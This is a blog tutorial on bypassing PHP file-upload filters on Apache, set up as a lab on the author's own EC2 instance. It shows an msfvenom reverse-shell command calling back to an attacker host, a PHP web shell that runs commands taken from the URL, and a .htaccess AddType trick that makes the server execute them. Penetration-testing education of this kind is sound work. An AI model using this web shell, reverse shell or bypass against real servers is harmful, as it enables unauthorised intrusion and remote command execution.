Bypass PHP File Upload Filters on Apache

by

Apache is one of the most popular http server nowadays. It hosts a hundreds of thousands applications, most of them written in PHP. Today I will present you how to bypass PHP file upload filters using MIME-type configuration changes.

This short directive,

AddType application/x-httpd-php .html

or, depends on service version,

AddHandler application/x-httpd-php5 .html

tells httpd to specify the Content-Type header for HTML files to be application/x-httpd-php. This way, both .php, .html or whatever page type containing PHP script that will be executed right after the page is sent to the browser. You can also add the above line in the .htaccess file in the directory where you want to run PHP scripts embedded to any page type.

Let’s see how the attacker may use that vulnerability to get into a server.

File upload functionality is one the common way to deliver and share content all over the internet. To prevent uploading malicious content, developers use filters to accept only a specific type of files and restrict executable content like .exe, .ps1, .sh and ect.

To see how the vulnerability works, I will leverage a AWS t3.micro EC2 instance. Creating VM, I would specify user data attribute to run simple Apache server:

#!/bin/bash
yum update -y
yum install -y httpd.x86_64
yum install -y php
systemctl start httpd.service
systemctl enable httpd.service
wget -q https://github.com/cybertechtalk/php-file-uploader/blob/main/index.php?raw=true -O /var/www/html/index.php

Before we start, check if security group allows tcp connection on port 80:

Bypass PHP File Upload Filters on Apache

Now, open /index.php. Here we go, our file uploader is up and ready to hack:

So, first let’s check if we could upload *.php reverse shell directly on the machine. First, create shell using with msfvenom (see my previous post how to create simple reverse shell with msfvenom):

$ msfvenom -p php/reverse_php LHOST=<attacker-ip> LPORT=8888 -f raw > shell.php

And try to upload:

If you look at the code available on my github, you can find a filter, which allows only specific file to be uploaded. So, let’s adjust our malicious script and change file extension. Creating very simple php one liner:

<?php

$command = $_GET['cmd'];

echo exec($command);

?>

or reverse shell:

$ msfvenom -p php/reverse_php LHOST=<attacker-ip> LPORT=8888 -f raw > shell.cybertech

and upload one more time:

Nice, now go to http://<ec2-public-ip>/shell.cybertech:

Not exactly what we expected to see. Now, we have to force Apache (httpd) to interpret *.cybertech file as php application and run it. To do so, let’s create simple .htaccess directive:

$ echo "AddType application/x-httpd-php .cybertech" > .htaccess
In case of brand new EC2 instance, it might be needed setting AllowOverride to All for /var/www/html in /etc/httpd/conf/httpd. conf

and upload to the root folder:

Fine! Now, open http://<ec2-public-ip>/shell.cybertech again and try ?cmd=whoami:

In this example, I showed you a simple way to bypass restricted PHP file uploader leveraging httpd handler AddType application/x-httpd-php. For more interesting content please keep an eye on CyberTechTalk blog or like the post below.

Have a good day, be an ethical,

save your privacy!

subscribe to newsletter

and receive weekly update from our blog

By submitting your information, you're giving us permission to email you. You may unsubscribe at any time.

Leave a Comment